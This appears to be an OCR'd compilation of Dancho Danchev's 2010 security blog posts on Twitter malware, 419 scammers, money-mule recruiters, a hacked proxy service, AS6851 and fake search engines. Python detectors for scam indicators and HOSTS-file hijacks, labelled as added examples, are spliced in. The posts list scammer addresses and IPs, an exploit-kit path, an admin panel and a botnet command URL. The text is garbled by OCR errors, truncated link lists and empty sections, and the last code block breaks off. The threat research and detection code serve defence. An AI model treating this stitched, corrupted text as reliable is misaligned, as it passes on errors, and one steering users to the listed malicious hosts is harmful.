SHA1: 3a7daa60389f463df795b78f16030dcc6fc1ff23
SHA1: 3054b48186f5e0981c41f200b3492caa0941f889
SHA1: 0e49c7656bec1ed43efb19187541d20c3ecb293b

This isn't the first time Twitter's been abused for malicious purposes, and is definitely not the last. Quick community response and take down actions hit them where it hurts most - the monetization vector.

Related assessments of Twitter malware campaigns:

[16]Twitter Malware Campaign Wants to Bank With You

[17]Dissecting Koobface Worm's Twitter Campaign

[18]From Ukraine with Scareware Serving Tweets, Bogus LinkedIn/Scribd Accounts, and Blackhat SEO Farms

[19]From Ukraine with Bogus Twitter, LinkedIn and Scribd Accounts

[20]Twitter Worm Mikeyy Keywords Hijacked to Serve Scareware

[21]Dissecting September's Twitter Scareware Campaign

This post has been reproduced from [22]Dancho Danchev's blog. Follow him [23]on Twitter.

1. http://sunbeltblog.blogspot.com/2010/06/pdf-exploit-spamrun-on-twitter.html

2. http://www.zdnet.com/blog/security/10-things-you-didnt-know-about-the-koobface-gang/5452?pg=2&tag=mantle_skin;content

3. http://ddanchev.blogspot.com/2010/02/how-koobface-gang-monetizes-mac-os-x.html

4. http://ddanchev.blogspot.com/2009/11/keeping-money-mule-recruiters-on-short.html

5. http://ddanchev.blogspot.com/2010/05/dissecting-mass-dreamhost-sites.html

6. http://ddanchev.blogspot.com/2010/03/gaztransitstroy-gaztranzitstroy-from.html

7. http://scanner.novirusthanks.org/analysis/2566c11a9cd2226b59d226e76bae9f64/ZTEuZGF0/

8. http://scanner.novirusthanks.org/analysis/8daaa96ba059e6b1d5108c314f160175/ZTIuZGF0/

9. http://scanner.novirusthanks.org/analysis/7b2534536cdf168f50d63845b13af8ba/dXBkMS5kYXQ=/

10. http://scanner.novirusthanks.org/analysis/323a1a2429467b3891cc20a26b82f851/dXBkMi5kYXQ=/

11. http://scanner.novirusthanks.org/analysis/d05d89bdadd8a23c2ceb0b016d49550a/dXBkNi5kYXQ=/

12. http://scanner.novirusthanks.org/analysis/1a582b50d82fb57bec036e1962e5da2e/dXBkNy5kYXQ=/

13. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

14. http://ddanchev.blogspot.com/2009/11/keeping-money-mule-recruiters-on-short.html

15. http://ddanchev.blogspot.com/2009/11/koobface-botnet-starts-serving-client.html

16. http://ddanchev.blogspot.com/2008/08/twitter-malware-campaign-wants-to-bank.html

17. http://ddanchev.blogspot.com/2009/07/dissecting-koobface-worms-twitter.html

18. http://ddanchev.blogspot.com/2009/06/from-ukraine-with-scareware-serving.html

19. http://ddanchev.blogspot.com/2009/07/from-ukraine-with-bogus-twitter.html

20. http://ddanchev.blogspot.com/2009/04/twitter-worm-mikeyy-keywords-hijacked.html

21. http://ddanchev.blogspot.com/2009/09/dissecting-septembers-twitter-scareware.html

22. http://ddanchev.blogspot.com/

23. http://twitter.com/danchodanchev


Sampling 419 Advance Fee Scams Activity (2010-06-17 16:25)

Lottery Winning Notifications, Western Union payment notifications, dead relatives, advance fee schemes impersonating law enforcement agencies - their arsenal of themes is endless; their IPs, however, aren't, taking into consideration the fact that the majority of 419 scams are not sent using botnets, but manually, and in a targeted fashion.

In fact, some of their spamming techniques ([1]419 scammers using Dilbert.com; [2]419 scammers using NYTimes.com 'email this' feature) are so primitive compared to the financial impact a successful advance fee scam has in the long term, that their KISS (Keep It Simple, Stupid) mentality reflects the current situation within the cybercrime ecosystem - they all KISS it to a certain extent - "[3]Report: Malicious PDF files comprised 80 percent of all exploits for 2009"; "[4]Reports: SQL injection attacks and malware led to most data breaches".

For the purpose of an experiment, and for related reasons, here's a raw snapshot of some 419-ers that just kept popping up, over and over again.

Persistent 419 advance fee scammers (over the last 7 days), the originating IPs, and the "reply to" email:

- a_chenchen@yahoo.cn - 218.17.239.18

- abdulkadera_maroofomar@hotmail.com - 41.138.180.86

- alfredmorris.m@btinternet.com - 211.101.13.230

- atmdept_serv001@yahoo.cn - 193.252.22.152

- austinalan@wanadoo.co.uk - 193.252.22.190

- avocat_doukoure@yahoo.fr - 78.229.212.4

- barpaulaffum@live.com - 41.210.31.214

- barr.rolandkenl@gmail.com - 221.235.112.210

- barristerhenryivanlooconsult02@yahoo.co.jp - 60.48.104.88

- barteddywili01@googlemail.com - 200.13.249.119

- cocacolaofficialprize19@yahoo.com.hk - 194.79.134.37

- courfed@aim.com - 79.123.210.10

- crichardchambers@rediff.com - 212.242.42.50

- curiehenria@yahoo.com, barr09amorisql@gmail.com - 123.176.96.137

- dr.austenobigwe008@gmail.com - 41.211.228.112

- drabejohn2009@aol.com - 217.72.192.242

- duncan.macdonald@9.cn, barr_duncan_macdonald@yahoo.co.uk - 86.43.60.104

- ecowascounsellordept@gmail.com - 115.242.97.173

- efccantigraft.nigeria077@gmail.com - 24.166.97.40

- Email.jmwilliams66@gmail.com, misteredwin22@gmail.com - 89.144.96.52

- fedex.courerservices1@hotmail.com, richardjohson@live.com - 87.194.255.145

- fedpeters07@aim.com - 81.31.115.2

- henryanthonyloanfirm@gmail.com - 200.40.197.69, 41.219.152.78

- icpcmistrynig@yahoo.com, fedeministrynig@gmail.com - 91.198.227.49

- janefugar2.u@hotmail.com - 82.196.5.120

- jimovia8787@gmail.com - 216.222.201.201

- John_chan3030@yahoo.com.hk - 200.171.215.2

- loannationwide2010@windowslive.com - 222.124.26.155

- mailesq.charlesstanley@gmail.com - 163.20.186.1

- maroofomar_abdulkader@yahoo.com - 62.193.229.238

- martha_ikobopayment@yahoo.com.hk - 41.138.172.81

- microwin2010@hotmail.co.uk - 200.105.120.151

- ministerdeliveryofficer@yahoo.cn - 193.252.22.190

- miss.kajat@googlemail.com - 67.15.16.31

- missblessing@sify.com - 196.28.250.53

- mr.parady700@hotmail.com - 80.200.242.17

- mrabdulhaleem@gmail.com - 66.11.225.183

- MRANNOLDSMITH2010@gmail.com - 82.128.17.211

- mrderekpaulatm405@gmail.com - 86.209.83.68

- Mrperentochaplain@rocketmail.com; Mrperentochalion@gmail.com - 112.110.186.25

- mrsabueke@cantv.net - 200.11.173.131

- niceme1970@yahoo.com - 80.12.242.27

- ntaiJerry7775@yahoo.com.hk - 125.141.17.158

- ochuko_babal@hotmail.fr - 65.55.111.159

- ochukobabal@gmail.com - 65.55.111.85

- officereplybackmaill@yahoo.com - 82.128.17.211

- organlotoint391@yahoo.com.hk - 207.194.87.105

- promoskllotto@rocketmail.com - 90.183.38.130

- realexchanges@aim.com - 212.225.181.101

- rev.sistermaryx31@gmail.com - 41.211.228.112

- robinkelley1967@hotmail.com - 85.214.37.73

- rpatmcard@hotmail.com - 195.83.9.36

- s.leel@yahoo.com, westernunionoffice99@gmail.com - 41.191.85.45

- shopperconsultant@live.co.uk - 195.137.70.240

- talkdelata3@gmail.com, mdelataecobank@gala.net - 116.255.152.124

- thefordfoundation.award0010@yahoo.co.uk - 222.124.9.54

- ubanigeria.nig65@gmail.com - 202.132.123.106

- vex.pressd2009@gmail.com - 66.48.81.131

- waziriefccng@live.com - 193.252.22.191

- worldbpr@9.cn - 41.204.224.19

- www.cn_western_union@w.cn - 41.222.192.82

- zakiawiiol01@yahoo.co.uk - 202.132.123.106

- zongo.ben177@gmail.com, mr_hiiu60@msn.com - 212.52.146.118

- bog_officemail@yahoo.co.jp - 82.128.2.78

- atmfinanceibc@web2mail.com - 41.218.237.202

- mrjohnsmith70@hotmail.com - 213.171.218.33

- junhuan9@yahoo.cn - 218.91.39.165
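The "reply-to e-mail / originating IP" pairs above are exactly the shape of indicator a mail gateway or SOC can match on: the From header of a 419 is routinely a throwaway or spoofed, but the Reply-To has to reach the scammer, which is why the post pivots on it. As an added example, not part of the post, here is a parser for the post's own listing format (one entry per line, any number of addresses and IPs, separated by " - ", "," or ";") and a check that matches one RFC 5322 message against it. The listing excerpt is copied from the entries above; the sample message, its sender name, subject, recipient and relay hostnames are constructed.

```python
import re
from collections import defaultdict
from email import message_from_string
from email.utils import getaddresses

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed excerpt, copied from the post's listing above, in its own format.
LISTING = """\
- a_chenchen@yahoo.cn - 218.17.239.18
- courfed@aim.com - 79.123.210.10
- curiehenria@yahoo.com, barr09amorisql@gmail.com - 123.176.96.137
- henryanthonyloanfirm@gmail.com - 200.40.197.69, 41.219.152.78
"""

# Constructed message: sender display name, subject, recipient and relay
# hostnames are assumed; the addresses and IP are taken from the listing.
SAMPLE_MESSAGE = """\
Received: from mail.example.net ([41.219.152.78]) by mx.example.org; Thu, 17 Jun 2010 10:00:00 +0000
From: "Barrister Henry" <henryanthonyloanfirm@gmail.com>
Reply-To: courfed@aim.com
To: recipient@example.org
X-Originating-IP: [41.219.152.78]
Subject: RE: YOUR FUND RELEASE

Dear friend, ...
"""


def parse_listing(text):
    """Return (emails, ips): each maps an indicator to the set of counterparts
    that appeared on the same entry, so a hit can be explained either way."""
    emails, ips = defaultdict(set), defaultdict(set)
    for line in text.splitlines():
        found_emails = [e.lower() for e in EMAIL_RE.findall(line)]
        found_ips = IPV4_RE.findall(line)
        for addr in found_emails:
            emails[addr].update(found_ips)
        for ip in found_ips:
            ips[ip].update(found_emails)
    return dict(emails), dict(ips)


def check_message(raw, emails, ips):
    """Match the reply path and originating IPs of one message against the listing.

    Returns (header, indicator) pairs in priority order: Reply-To first, since
    that is the address the victim's answer must reach, then the sender headers,
    then any listed IP found in the originating-IP or Received trace.
    """
    msg = message_from_string(raw)
    hits = []
    for header in ("Reply-To", "From", "Return-Path"):
        for _, addr in getaddresses(msg.get_all(header, [])):
            if addr.lower() in emails:
                hits.append((header, addr.lower()))
    for header in ("X-Originating-IP", "Received"):
        for value in msg.get_all(header, []):
            for ip in IPV4_RE.findall(value):
                if ip in ips:
                    hits.append((header, ip))
    return hits


if __name__ == "__main__":
    known_emails, known_ips = parse_listing(LISTING)
    for header, indicator in check_message(SAMPLE_MESSAGE, known_emails, known_ips):
        print("%-16s %s" % (header, indicator))
```

IP hits are the weakest signal here: many entries above sit on shared webmail or ISP egress ranges (193.252.22.x appears under three different senders), so an IP-only match should raise a score rather than block on its own, while a Reply-To match against a curated list is close to conclusive.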

Nothing hurts as much as decent historical OSINT regarding the activities of any cybercriminal. Moreover, this historical OSINT not only contributes to more efficient case building, but also helps to establish some pretty interesting connections within the cybercrime ecosystem. As practice and experience have shown, this very same ecosystem is not necessarily as big as originally assumed.

Consider going through the related fraudulent schemes/malicious campaigns currently taking advantage of FIFA's World Cup - [5]Protection tips for the upcoming FIFA World Cup themed cybercrime campaigns.

This post has been reproduced from [6]Dancho Danchev's blog. Follow him [7]on Twitter.

1. http://www.zdnet.com/blog/security/419-scammers-using-dilbertcom/3809

2. http://www.zdnet.com/blog/security/419-scammers-using-nytimescom-email-this-feature/3491

3. http://www.zdnet.com/blog/security/report-malicious-pdf-files-comprised-80-percent-of-all-exploits-for-2009/5473

4. http://www.zdnet.com/blog/security/reports-sql-injection-attacks-and-malware-led-to-most-data-breaches/54

5. http://www.zdnet.com/blog/security/protection-tips-for-the-upcoming-fifa-world-cup-themed-cybercrime-campaigns/6610

6. http://ddanchev.blogspot.com/

7. http://twitter.com/danchodanchev
Money Mule Recruiters Trick Mules Into Installing Fake Transaction Certificates (2010-06-29 11:07)

What is more flattering than Ukrainian blackhat SEO gangs using your name as redirectors, including offensive messages, the Koobface gang redirecting Facebook's IP space to your blog, or a plain simple danchodanchev admin panel within a Crime Pack kit?

It's the money mule recruiters who modify the HOSTS file of gullible mules to redirect ddanchev.blogspot.com and bobbear.co.uk to 127.0.0.1. Now that's flattering, considering the fact that my public money mule ecosystem related research represents a tiny percentage of the real profiling/activities taking place behind the curtains.
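The HOSTS file tampering described above, pinning ddanchev.blogspot.com and bobbear.co.uk to 127.0.0.1 so the mule can no longer reach the sites that would have warned them, is cheap to check for on an endpoint, and the same check catches the more dangerous variant where a banking hostname is pinned to an attacker's address. The following is an added example, not code from the post: it parses a hosts file, ignores the entries every system legitimately has, and flags public names that are either sinkholed (loopback or 0.0.0.0) or redirected (any other fixed address). The sample file, the corp.example names and the www.example-bank.test entry are constructed; the two sinkholed names are the ones the post mentions.

```python
import ipaddress

# Names that legitimately live in every hosts file and never indicate tampering.
BUILTIN_NAMES = {
    "localhost", "localhost.localdomain", "broadcasthost",
    "ip6-localhost", "ip6-loopback", "ip6-localnet", "ip6-mcastprefix",
    "ip6-allnodes", "ip6-allrouters", "ip6-allhosts",
}

# Constructed sample modelled on the tampering the post describes.  The
# corp.example and example-bank.test names are assumed, not from the post.
SAMPLE_HOSTS = """\
# Host Database
127.0.0.1       localhost
::1             localhost ip6-localhost ip6-loopback
127.0.1.1       workstation.corp.example
10.0.0.5        intranet.corp.example      # deliberate internal override
127.0.0.1       ddanchev.blogspot.com
127.0.0.1       bobbear.co.uk
203.0.113.9     www.example-bank.test
"""


def parse_hosts(text):
    """Yield (line number, address, hostname) for every mapping, skipping comments and blanks."""
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # first field is not an address; leave malformed lines to a separate lint
        for name in fields[1:]:
            yield lineno, addr, name.lower()


def audit_hosts(text, own_hostnames=frozenset(), allowlist=frozenset()):
    """Flag public (dotted) names pinned in a hosts file.

    A loopback or unspecified target means the name has been sinkholed: the
    anti-fraud sites the post mentions simply stop resolving.  Any other target
    means DNS is bypassed for that name, which is how a banking site ends up on
    an attacker's server.  own_hostnames and allowlist hold the machine's own
    name and deliberate overrides.  Returns (line, name, address, verdict) tuples.
    """
    findings = []
    for lineno, addr, name in parse_hosts(text):
        if name in BUILTIN_NAMES or name in own_hostnames or name in allowlist or "." not in name:
            continue
        verdict = "sinkholed" if (addr.is_loopback or addr.is_unspecified) else "redirected"
        findings.append((lineno, name, str(addr), verdict))
    return findings


if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS,
                               own_hostnames={"workstation.corp.example"},
                               allowlist={"intranet.corp.example"}):
        print("line %d: %s -> %s (%s)" % finding)
```

On Windows the file to read is %SystemRoot%\System32\drivers\etc\hosts, on Unix-like systems /etc/hosts; a fleet-wide version of this check would hash the file and alert on any change rather than re-parse it, but the parse is what tells you which names were touched.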


Related coverage of money laundering/recruitment in the context of cybercrime:

[1]Keeping Money Mule Recruiters on a Short Leash - Part Four

[2]Money Mule Recruitment Campaign Serving Client-Side Exploits

[3]Keeping Money Mule Recruiters on a Short Leash - Part Three

[4]Money Mule Recruiters on Yahoo!'s Web Hosting

[5]Dissecting an Ongoing Money Mule Recruitment Campaign

[6]Keeping Money Mule Recruiters on a Short Leash - Part Two

[7]Keeping Reshipping Mule Recruiters on a Short Leash

[8]Keeping Money Mule Recruiters on a Short Leash

[9]Standardizing the Money Mule Recruitment Process

[10]Inside a Money Laundering Group's Spamming Operations

[11]Money Mule Recruiters use ASProx's Fast Fluxing Services

[12]Money Mules Syndicate Actively Recruiting Since 2002

This post has been reproduced from [13]Dancho Danchev's blog. Follow him [14]on Twitter.

1. http://ddanchev.blogspot.com/2010/04/keeping-money-mule-recruiters-on-short.html

2. http://ddanchev.blogspot.com/2010/03/money-mule-recruitment-campaign-serving.html

3. http://ddanchev.blogspot.com/2010/03/keeping-money-mule-recruiters-on-short.html

4. http://ddanchev.blogspot.com/2010/03/money-mule-recruiters-on-yahoos-web.html

5. http://ddanchev.blogspot.com/2010/02/dissecting-ongoing-money-mule.html

6. http://ddanchev.blogspot.com/2010/02/keeping-money-mule-recruiters-on-short.html

7. http://ddanchev.blogspot.com/2009/12/keeping-reshipping-mule-recruiters-on.html

8. http://ddanchev.blogspot.com/2009/11/keeping-money-mule-recruiters-on-short.html

9. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

10. http://ddanchev.blogspot.com/2009/05/inside-money-laundering-groups-spamming.html

11. http://ddanchev.blogspot.com/2008/07/money-mule-recruiters-use-asproxs-fast.html

12. http://ddanchev.blogspot.com/2008/10/money-mules-syndicate-actively.html

13. http://ddanchev.blogspot.com/

14. http://twitter.com/danchodanchev
1.7 July
















































[Screenshot: ZDNet Zero Day front page, with the headlines "Googler releases Windows zero-day exploit, Microsoft unimpressed", "Adobe plugs security holes in PDF Reader, Acrobat", "Researchers find 12 zero day flaws, targeting 5 web malware exploitation kits" and "From prediction to prophecy: The 2010 threat landscape"]
Summarizing Zero Day's Posts for June (2010-07-05 21:35)

The following is a brief summary of all of my posts at [1]ZDNet's Zero Day for June, 2010. You [2]can also go through [3]previous summaries, as well as subscribe to my [4]personal RSS feed, [5]Zero Day's main feed, or follow me on Twitter:

Recommended reading

• [6]The security and privacy ramifications of AT&T's iLeak

• [7]The EFF releases new HTTPS Everywhere Firefox extension

• [8]Researchers find 12 zero day flaws, targeting 5 web malware exploitation kits

01. [9]Malware Watch: Free Mac OS X screensavers bundled with spyware

02. [10]Protection tips for the upcoming FIFA World Cup themed cybercrime campaigns

03. [11]Malware Watch: Twitter password reset emails, IRS-themed crimeware, malicious PDFs, and fake YouTube pages

04. [12]The security and privacy ramifications of AT&T's iLeak

05. [13]Malware Watch: Adobe zero day attack, malicious FIFA-themed spam, exploit serving Virus Alerts

06. [14]Malware Watch: Skype exploit, Skype-themed malicious spam campaigns detected

07. [15]The EFF releases new HTTPS Everywhere Firefox extension

08. [16]Researchers find 12 zero day flaws, targeting 5 web malware exploitation kits

This post has been reproduced from [17]Dancho Danchev's blog. Follow him [18]on Twitter.

1. http://blogs.zdnet.com/security

2. http://ddanchev.blogspot.com/2010/05/summarizing-zero-days-posts-for-may.html

o=1&mode=rss&tag=mantle_skin;content

9. http://www.zdnet.com/blog/security/malware-watch-free-

10. http://www.zdnet.com/blog/security/protection-tips-for-the-upcoming-fifa-world-cup-themed-cybercrime-campaigns/6610

11. http://www.zdnet.com/blog/security/malware-watch-twitter-password-reset-emails-irs-themed-crimeware-malicious-pdfs-and-fake-youtube-pages/6636

12. http://www.zdnet.com/blog/security/the-security-and-privacy-ramifications-of-at-ts-ileak/6649
Cybercriminals SQL Inject Cybercrime-friendly Proxies Service (2010-07-13 23:00)

Cybercrime ecosystem irony, at its best. Why the irony? Because the cybercrime-friendly proxies service's TOS explicitly states that its users cannot launch XSS/SQL injection attacks through it.

A relatively low profile cybercriminal has managed to exploit a remote SQL injection within a popular proxies service, offering access to compromised hosts across the globe for any kind of malicious activities. Based on the video released, he was able to access everyone's password as an MD5 hash, as well as impersonate the users of the service, using a trivial flaw in the online.cgi script.

Although his intention, based on the note left in a readme.txt file featured in the video, was to allow others to use the paid service freely, the potential for undermining the OPSEC of cybercriminals using the service is enormous, as it not only logs their financial transactions and keeps records of their IPs, but, most interestingly, allows the "manual feeding" of proxy lists (compromised and freely accessible hosts) into the database.

The service itself has been in operation since 2004, operating under different brands, with prices starting from $20 to $90 for access to 150 and 1500 hosts on a monthly basis. Some interesting facts from a threat intel/social network analysis perspective, including screenshots (purposely blurred in order to avoid ruining important OSINT sources) of the service obtained from its help file:

• The gang/hacking/script kiddies team operates different business operations online

• They maintain a traffic purchasing program monetizing traffic through [1]cybercrime-friendly search engines

• Whether they are lazy, or just don't care, 4 currently active adult web sites share the same infrastructure as the service itself

• Although the original owners are Russian, they appear to be franchising, since one of their brands is offering their services in Indonesian, including a banner for what looks like an Indonesian security conference

• One of the Indonesian franchisees is known to have been offering root accounts and shells at compromised servers for sale, back in 2007
For years, compromised malware hosts have been widely abused for anything from direct spamming to hosting spam/phishing and malware campaigns, but most importantly to engineer cyber warfare tensions by directly forwarding the responsibility for the malicious actions of the cybercriminal/cyber spy to the host/network/country in question.

Not only do these tactics undermine the currently implemented data retention regulations (how can you retain data from a compromised ecosystem that keeps no logs?), but they also offer a safe haven for the execution of each and every cybercriminal practice there is.

Related posts: 

[2] Should a targeted country strike back at the cyber 
attackers? 

[3] Malware Infected Hosts as Stepping Stones 

[4] The Cost of Anonymizing a Cybercriminal's Internet 
Activities 
[5] The Cost of Anonymizing a Cybercriminal's Internet Activities - Part Two

This post has been reproduced from [6]Dancho Danchev's blog. Follow him [7]on Twitter.

1. http://www.zdnet.com/blog/security/cybercriminals-
Exploits, Malware, and Scareware Courtesy of AS6851, BKCNET, Sagade Ltd. (2010-07-14 19:54)

Never trust an AS whose abuse-mailbox is using a Gmail account (piotrek89@gmail.com), and in particular one that you've come across during several malware campaigns over the past couple of months. It's [1]AS6851, BKCNET "SIA" IZZI I'm referring to, also known as Sagade Ltd.

Let's dissect the currently ongoing malicious activity at that Latvian-based AS, expose the exploit/malware/crimeware/scareware serving domain portfolios, sample some of the currently active binaries, emphasize the hijacking of the Google, Yahoo and Bing search engines, and take a brief retrospective of AS6851's activities profiled over the past couple of months.

What's so special about AS6851 anyway? It's the numerous times the AS popped up in previously profiled campaigns (see related posts at the bottom of the post), next to a pretty interesting Koobface gang connection. [2]An excerpt from a previous post:

"What's so special about [3]AS6851, BKCNET "SIA" IZZI anyway? It's the Koobface gang connection in the face of urodinam.net, which is also hosted within AS6851, currently responding to 91.188.59.10. More details on urodinam.net:

• [4]Koobface Botnet's Scareware Business Model

• [5]Koobface Botnet's Scareware Business Model - Part Two

Moreover, on the exact same IP where Koobface gang's urodinam.net is parked, we also have the currently active Izabsiwvn538n4i5tcji.com - Email: michaeltycoon@gmail.com, serving client side exploits using the Yes Malware Exploitation kit - 91.188.59.10/temp/cache/PDF.php; admin panel at: Izabsiwvn538n4i5tcji.com/temp/admin/index.php

The same michaeltycoon@gmail.com used to register Izabsiwvn538n4i5tcji.com was also profiled in the "[6]Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang" assessment."

Related data on AS6851, BKCNET/Sagade Ltd.:

netname: ATECH-SAGADE
descr: Sagade Ltd.
descr: Latvia, Rezekne, Darzu 21
descr: +371 20034981
remarks: abuse-mailbox: piotrek89@gmail.com
country: LV
admin-c: JS1449-RIPE
tech-c: JS1449-RIPE
status: ASSIGNED PA
mnt-by: AS6851-MNT
source: RIPE # Filtered

person: Juris Sahurovs
remarks: Sagade Ltd.
address: Latvia, Rezekne, Darzu 21
phone: +371 20034981
abuse-mailbox: piotrek89@gmail.com
nic-hdl: JS1449-RIPE
mnt-by: ATECH-MNT
source: RIPE # Filtered

AS6851 advertises 15 prefixes: 


Uplink courtesy of:

AS6747, LATTELEKOM Lattelekom

AS5518, TELIALATVIJA Telia Latvija SIA

Currently active exploits/malware/scareware serving domain 
portfolios within AS6851: 

Parked at/responding to 85.234.190.15 are: 

Parked at/responding to 85.234.190.4 are:
Parked at/responding to 91.188.60.225 are:



Parked at/responding to 91.188.60.3 are: 



Parked at/responding to 91.188.59.74 are: 
Parked at/responding to 85.234.190.16 are:
Detection rates for the currently active malware samples, including the HOSTS file modifications on infected hosts for the purpose of redirecting users to [7]cybercrime-friendly search engines, monetized through traffic trading affiliate programs.


The payment gateway structure and related domains for the scareware campaigns:


In respect to the IPs used in the HOSTS file modifications, one is of particular interest - 89.149.210.109, as it was first profiled in November 2009's "[21]Koobface Botnet's Scareware Business Model - Part Two", with MD5 0fbf1a9f8e6e305138151440da58b4f1 modifying the HOSTS file using the same IP and also phoning back to the Koobface gang's 1.0 hardcore C&C - urodinam.net/8732489273.php
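Detection logic for the search-engine HOSTS hijack described above, as an added example that is not part of the original post: it parses HOSTS-file text, ignores loopback/unspecified targets (ad-blocking files use those legitimately), and reports any external IP that pins several Google, Yahoo search or Bing hostnames. The sample HOSTS content is constructed to mirror the page's pattern; the hostname patterns and the threshold of three are assumptions.

```python
"""Flag HOSTS-file search-engine hijacks of the kind profiled above.

Added example, not code from the original post. The sample HOSTS content
below is constructed to mirror the page's pattern: many Google country
domains plus Yahoo/Bing search hosts all pinned to one external IP.
"""
import ipaddress
import re
from collections import defaultdict

# Hostnames a legitimate HOSTS file has no business resolving to an external
# address. Assumption for this example: the page's dumps hijack google.*,
# search.yahoo.* and bing.com; extend the tuple for your own environment.
SEARCH_ENGINE_PATTERNS = (
    re.compile(r"^(www\.)?google\.[a-z.]+$"),
    re.compile(r"^([a-z]{2}\.)?search\.yahoo\.com$"),
    re.compile(r"^(www\.)?bing\.com$"),
)


def parse_hosts(text):
    """Yield (ip_address, hostname) pairs from HOSTS-file text, skipping comments."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue                           # address without a hostname
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue                           # malformed address field
        for host in parts[1:]:                 # one address may carry several names
            yield ip, host.lower()


def is_search_engine_host(host):
    """True when the hostname belongs to one of the watched search engines."""
    return any(p.match(host) for p in SEARCH_ENGINE_PATTERNS)


def find_search_hijacks(text, min_hosts=3):
    """Return {ip: [hostnames]} for external IPs pinning >= min_hosts search hosts.

    Loopback/unspecified targets are ignored: ad-blocking HOSTS files commonly
    map unwanted hosts to 127.0.0.1 or 0.0.0.0, which is not a hijack.
    """
    by_ip = defaultdict(list)
    for ip, host in parse_hosts(text):
        if ip.is_loopback or ip.is_unspecified:
            continue
        if is_search_engine_host(host):
            by_ip[ip].append(host)
    return {str(ip): hosts for ip, hosts in by_ip.items() if len(hosts) >= min_hosts}


# Constructed sample: a benign localhost entry, an ad-block style entry, an
# internal override, and a hijack block pinned to 89.149.210.109 (the IP the
# post singles out).
SAMPLE_HOSTS = """\
127.0.0.1 localhost
0.0.0.0 ads.example.invalid   # ad-blocking entry, not a hijack
89.149.210.109 www.google.com
89.149.210.109 www.google.de
89.149.210.109 www.google.co.uk
89.149.210.109 search.yahoo.com
89.149.210.109 uk.search.yahoo.com
89.149.210.109 www.bing.com
10.0.0.5 intranet.example.invalid  # internal override, unrelated
"""

if __name__ == "__main__":
    for ip, hosts in find_search_hijacks(SAMPLE_HOSTS).items():
        print(f"{ip} hijacks {len(hosts)} search hosts: {', '.join(hosts)}")
```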

When it comes to cybercrime, there's no such thing as a 
coincidence. What's static is the [22]interaction between 
the usual suspects, systematically switching hosting 
providers, introducing new domains, and [23]conveniently 
denying their monetization tactics. 

You wish. 

Profiled AS6851, BKCNET/Sagade Ltd. activity: 

[24] GoDaddy's Mass WordPress Blogs Compromise Serving Scareware

[25] Dissecting the Mass DreamHost Sites Compromise

[26] Spamvertised iTunes Gift Certificates and CV Themed 
Malware Campaigns 

[27] Dissecting the 100,000+ Scareware Serving Fake 
YouTube Pages Campaign 

[28] Facebook Photo Album Themed Malware Campaign, 
Mass SQL Injection Attacks Courtesy of AS42560 

This post has been reproduced from [29]Dancho 
Danchev's blog. Follow him [30]on Twitter. 

1. http://cidr-report.org/cgi-bin/as-report?as=AS6851

2. http://ddanchev.blogspot.com/2010/05/dissecting-mass-dreamhost-sites.html

3. https://zeustracker.abuse.ch/monitor.php?as=6851
Sampling Malicious Activity Inside Cybercrime-Friendly Search Engines (2010-07-15 17:44)

UPDATED, Friday, July 16, 2010 - Directi has suspended 
the domains portfolio of the cybercrime-friendly search 
engines. 

[ 1 JCybercrime-friendly search engines are bogus 
search engines, which in between visually social 
engineering their users, offer fake results leading to client- 
side exploits, bogus video players dropping more malware, 
sea re ware, next to the pharmaceutical scams, and domain 
farms neatly embedded with Google AdSense scripts for 
monetization. 

In the majority of cases - whenever blackhat 5E0 is not an 
option - end users are exposed the their maliciousness once 
they get infected with malware redirecting each and every 
request to popular search engines such as Google, 

Yahoo and Bing to the malicious IPs/domains operated by 
the cybercriminals. 













As far as their monetization tactics are concerned, fellow 
cybercriminals are free to purchase any kind of key¬ 
word they want to, for instance "spyware", make it look like 
the end user is clicking on security-vendor.corn's site, 560 
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whereas upon clicking, based on his physical location a 
particular type of malicious activity takes place. 

Remember the HOSTS file modification taking place courtesy of the malware at [2]AS6851, BKCNET, Sagade Ltd., and in particular the [3]Koobface gang related IP 89.149.210.109? Sampling the malicious activity within the search engines parked/forwarded (DNS recursion) from this IP results in client-side exploits, bogus video players dropping malware, and scareware, and that in less than 5 minutes of testing. 
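The HOSTS-file redirection described above can be checked for on an endpoint. The following is an added example, not code from the original post: it parses HOSTS-file text and flags any non-loopback mapping for Google, Yahoo or Bing hostnames; the sample file content and the 198.51.100.7 address are constructed.

```python
"""Flag HOSTS-file entries that hijack popular search engines.

Added example, not code from the original post. Malware in the campaign
rewrites the HOSTS file so that Google, Yahoo and Bing resolve to IPs the
attackers control; this parser reports every such mapping. The sample
HOSTS content and the 198.51.100.7 address below are constructed.
"""
import ipaddress
from typing import List, Tuple

# Hostnames a HOSTS file on an end-user machine should never pin.
# (Assumption: your environment does not legitimately override these.)
WATCHED_SUFFIXES = ("google.com", "yahoo.com", "bing.com")


def _is_benign_target(ip) -> bool:
    # localhost lines and ad-blocking lists (0.0.0.0) are the normal
    # legitimate contents of a HOSTS file; anything else is a real redirect.
    return ip.is_loopback or ip.is_unspecified


def _is_watched(hostname: str) -> bool:
    h = hostname.lower().rstrip(".")
    return any(h == s or h.endswith("." + s) for s in WATCHED_SUFFIXES)


def find_search_engine_hijacks(hosts_text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, hostname, ip) for every suspicious mapping."""
    findings: List[Tuple[int, str, str]] = []
    for lineno, raw in enumerate(hosts_text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()  # strip trailing comments
        if not line:
            continue
        parts = line.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # malformed line, not a resolvable mapping
        if _is_benign_target(ip):
            continue
        # One HOSTS line may carry several hostnames for the same IP.
        for name in parts[1:]:
            if _is_watched(name):
                findings.append((lineno, name, str(ip)))
    return findings


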